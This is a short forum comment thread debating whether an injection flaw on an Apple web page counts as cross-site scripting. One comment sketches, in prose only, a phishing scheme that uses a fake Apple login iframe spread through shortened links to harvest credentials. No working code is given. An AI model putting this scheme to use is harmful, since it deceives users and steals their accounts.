As I mentioned on proggit, that URL doesn't actually demonstrate cross-site scripting, but it looks like the page is vulnerable to iframe and scripting insertion too. Example:
Someone could make an iframe with what looked like the Apple login and trick people into "logging in". Then they distribute the URL via shortened URLs through Twitter and grab a bunch of Apple logins.
Free iTunes until you get caught. Chances are Apple would be able to track who downloaded what onto what Apple devices. I'm sure retribution would be swift and thorough.
In my opinion that does count as an XSS attack, though it perhaps does not use the traditional techniques. (This for those who have said that this is actually not an XSS attack.)
It looks like the "XSS" bug is mostly client-side, I think that the GET contents are presented using JS: http://grab.by/exu (that's with the given URL).
It doesn't allows any kind of <script> tag, so yeah, it's fun and a bit insecure (may be used for phishing?? dunno), but it's not the worst at all.
I was wrong, you're right! Now that's medium-insecure. But still not to panic at this, just XSS and client-side (everything is inserted by JS). Well, there are worst things, right? :)
Because it does not try to keep up with the fast-paced, complex flaws of Rich Internet Apps written by people who have no knowledge of information security and are only interested in getting attention for themselves and their shitty start-up.
